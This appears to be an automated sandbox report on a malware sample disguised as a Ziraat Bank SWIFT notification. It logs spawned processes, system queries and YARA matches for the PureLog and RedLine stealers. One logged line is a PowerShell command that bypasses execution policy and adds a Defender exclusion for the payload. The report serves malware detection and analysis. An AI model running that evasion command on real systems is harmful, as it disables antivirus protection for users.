Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\differences\niellist.exe"

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

0_2_00457CAF

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0045874B

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1271710089.00000000004B4000.00000002.00000001.01000000.00000003.sdmp, Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1262264862.00000000041C3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0042862B cpuid

0_2_0042862B

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

9_2_00417A20

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\alg.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST5268.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST5269.tmp VolumeInformation
Source: C:\Windows\System32\msdtc.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Locator.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00434E87

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00441E06 GetUserNameW,

0_2_00441E06

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00433F3A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.3d96458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5390000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5390000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3d95570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300ee8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2a20f3e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300ee8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3dfb390.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1307610428.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1312948986.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1312584918.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 7280, type: MEMORYSTR
